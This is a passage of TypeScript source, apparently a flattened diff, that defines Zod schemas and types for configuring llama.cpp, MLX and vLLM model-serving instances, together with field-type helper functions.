threads_batch: z.number().optional(),
cpu_mask: z.string().optional(),
cpu_range: z.string().optional(),
cpu_strict: z.number().optional(),
prio: z.number().optional(),
poll: z.number().optional(),
cpu_mask_batch: z.string().optional(),
cpu_range_batch: z.string().optional(),
cpu_strict_batch: z.number().optional(),
prio_batch: z.number().optional(),
poll_batch: z.number().optional(),
ctx_size: z.number().optional(),
predict: z.number().optional(),
batch_size: z.number().optional(),
ubatch_size: z.number().optional(),
keep: z.number().optional(),
flash_attn: z.boolean().optional(),
no_perf: z.boolean().optional(),
escape: z.boolean().optional(),
no_escape: z.boolean().optional(),
rope_scaling: z.string().optional(),
rope_scale: z.number().optional(),
rope_freq_base: z.number().optional(),
rope_freq_scale: z.number().optional(),
yarn_orig_ctx: z.number().optional(),
yarn_ext_factor: z.number().optional(),
yarn_attn_factor: z.number().optional(),
yarn_beta_slow: z.number().optional(),
yarn_beta_fast: z.number().optional(),
dump_kv_cache: z.boolean().optional(),
no_kv_offload: z.boolean().optional(),
cache_type_k: z.string().optional(),
cache_type_v: z.string().optional(),
defrag_thold: z.number().optional(),
parallel: z.number().optional(),
mlock: z.boolean().optional(),
no_mmap: z.boolean().optional(),
numa: z.string().optional(),
device: z.string().optional(),
override_tensor: z.array(z.string()).optional(),
gpu_layers: z.number().optional(),
split_mode: z.string().optional(),
tensor_split: z.string().optional(),
main_gpu: z.number().optional(),
check_tensors: z.boolean().optional(),
override_kv: z.array(z.string()).optional(),
lora: z.array(z.string()).optional(),
lora_scaled: z.array(z.string()).optional(),
control_vector: z.array(z.string()).optional(),
control_vector_scaled: z.array(z.string()).optional(),
control_vector_layer_range: z.string().optional(),
model: z.string().optional(),
model_url: z.string().optional(),
hf_repo: z.string().optional(),
hf_repo_draft: z.string().optional(),
hf_file: z.string().optional(),
hf_repo_v: z.string().optional(),
hf_file_v: z.string().optional(),
hf_token: z.string().optional(),
log_disable: z.boolean().optional(),
log_file: z.string().optional(),
log_colors: z.boolean().optional(),
verbose: z.boolean().optional(),
verbosity: z.number().optional(),
log_prefix: z.boolean().optional(),
log_timestamps: z.boolean().optional(),
// Environment variables
environment: z.record(z.string(), z.string()).optional(),
// Sampling params
samplers: z.string().optional(),
seed: z.number().optional(),
sampling_seq: z.string().optional(),
ignore_eos: z.boolean().optional(),
temp: z.number().optional(),
top_k: z.number().optional(),
top_p: z.number().optional(),
min_p: z.number().optional(),
xtc_probability: z.number().optional(),
xtc_threshold: z.number().optional(),
typical: z.number().optional(),
repeat_last_n: z.number().optional(),
repeat_penalty: z.number().optional(),
presence_penalty: z.number().optional(),
frequency_penalty: z.number().optional(),
dry_multiplier: z.number().optional(),
dry_base: z.number().optional(),
dry_allowed_length: z.number().optional(),
dry_penalty_last_n: z.number().optional(),
dry_sequence_breaker: z.array(z.string()).optional(),
dynatemp_range: z.number().optional(),
dynatemp_exp: z.number().optional(),
mirostat: z.number().optional(),
mirostat_lr: z.number().optional(),
mirostat_ent: z.number().optional(),
logit_bias: z.array(z.string()).optional(),
grammar: z.string().optional(),
grammar_file: z.string().optional(),
json_schema: z.string().optional(),
json_schema_file: z.string().optional(),
// Example-specific params
no_context_shift: z.boolean().optional(),
special: z.boolean().optional(),
no_warmup: z.boolean().optional(),
spm_infill: z.boolean().optional(),
pooling: z.string().optional(),
cont_batching: z.boolean().optional(),
no_cont_batching: z.boolean().optional(),
mmproj: z.string().optional(),
mmproj_url: z.string().optional(),
no_mmproj: z.boolean().optional(),
no_mmproj_offload: z.boolean().optional(),
alias: z.string().optional(),
host: z.string().optional(),
port: z.number().optional(),
path: z.string().optional(),
no_webui: z.boolean().optional(),
embedding: z.boolean().optional(),
reranking: z.boolean().optional(),
api_key: z.string().optional(),
api_key_file: z.string().optional(),
ssl_key_file: z.string().optional(),
ssl_cert_file: z.string().optional(),
chat_template_kwargs: z.string().optional(),
timeout: z.number().optional(),
threads_http: z.number().optional(),
cache_reuse: z.number().optional(),
metrics: z.boolean().optional(),
slots: z.boolean().optional(),
props: z.boolean().optional(),
no_slots: z.boolean().optional(),
slot_save_path: z.string().optional(),
jinja: z.boolean().optional(),
reasoning_format: z.string().optional(),
reasoning_budget: z.number().optional(),
chat_template: z.string().optional(),
chat_template_file: z.string().optional(),
no_prefill_assistant: z.boolean().optional(),
slot_prompt_similarity: z.number().optional(),
lora_init_without_apply: z.boolean().optional(),
draft_max: z.number().optional(),
draft_min: z.number().optional(),
draft_p_min: z.number().optional(),
ctx_size_draft: z.number().optional(),
device_draft: z.string().optional(),
gpu_layers_draft: z.number().optional(),
model_draft: z.string().optional(),
cache_type_k_draft: z.string().optional(),
cache_type_v_draft: z.string().optional(),
// Audio/TTS params
model_vocoder: z.string().optional(),
tts_use_guide_tokens: z.boolean().optional(),
// Default model params
embd_bge_small_en_default: z.boolean().optional(),
embd_e5_small_en_default: z.boolean().optional(),
embd_gte_small_default: z.boolean().optional(),
fim_qwen_1_5b_default: z.boolean().optional(),
fim_qwen_3b_default: z.boolean().optional(),
fim_qwen_7b_default: z.boolean().optional(),
fim_qwen_7b_spec: z.boolean().optional(),
fim_qwen_14b_spec: z.boolean().optional(),
// Backend configuration
backend_type: z.enum([BackendType.LLAMA_CPP, BackendType.MLX_LM, BackendType.VLLM]).optional(),
backend_options: BackendOptionsSchema.optional(),
})
// Infer the TypeScript type from the schema
// Re-export types and schemas from backend files
export {
LlamaCppBackendOptionsSchema,
MlxBackendOptionsSchema,
VllmBackendOptionsSchema,
type LlamaCppBackendOptions,
type MlxBackendOptions,
type VllmBackendOptions,
getAllLlamaCppFieldKeys,
getAllMlxFieldKeys,
getAllVllmFieldKeys,
getLlamaCppFieldType,
getMlxFieldType,
getVllmFieldType
}
// Infer the TypeScript types from the schemas
export type BackendOptions = z.infer<typeof BackendOptionsSchema>
export type CreateInstanceOptions = z.infer<typeof CreateInstanceOptionsSchema>
// Helper to get all field keys
// Helper to get all field keys for CreateInstanceOptions
export function getAllFieldKeys(): (keyof CreateInstanceOptions)[] {
return Object.keys(CreateInstanceOptionsSchema.shape) as (keyof CreateInstanceOptions)[]
}
// Get field type from Zod schema
export function getFieldType(key: keyof CreateInstanceOptions): 'text' | 'number' | 'boolean' | 'array' {
export function getFieldType(key: keyof CreateInstanceOptions): 'text' | 'number' | 'boolean' | 'array' | 'object' {
const fieldSchema = CreateInstanceOptionsSchema.shape[key]
if (!fieldSchema) return 'text'
// Handle ZodOptional wrapper
const innerSchema = fieldSchema instanceof z.ZodOptional ? fieldSchema.unwrap() : fieldSchema
if (innerSchema instanceof z.ZodBoolean) return 'boolean'
if (innerSchema instanceof z.ZodNumber) return 'number'
if (innerSchema instanceof z.ZodArray) return 'array'
if (innerSchema instanceof z.ZodObject) return 'object'
if (innerSchema instanceof z.ZodRecord) return 'object' // Handle ZodRecord as object
return 'text' // ZodString and others default to text
}

View File

@@ -2,14 +2,26 @@ import type { CreateInstanceOptions } from '@/schemas/instanceOptions'
export { type CreateInstanceOptions } from '@/schemas/instanceOptions'
export const BackendType = {
LLAMA_CPP: 'llama_cpp',
MLX_LM: 'mlx_lm',
VLLM: 'vllm',
// MLX_VLM: 'mlx_vlm', // Future expansion
} as const
export type BackendTypeValue = typeof BackendType[keyof typeof BackendType]
export type InstanceStatus = 'running' | 'stopped' | 'failed'
export interface HealthStatus {
status: 'ok' | 'loading' | 'error' | 'unknown'
status: 'ok' | 'loading' | 'error' | 'unknown' | 'failed'
message?: string
lastChecked: Date
}
export interface Instance {
name: string;
running: boolean;
status: InstanceStatus;
options?: CreateInstanceOptions;
docker_enabled?: boolean; // indicates backend is running via Docker
}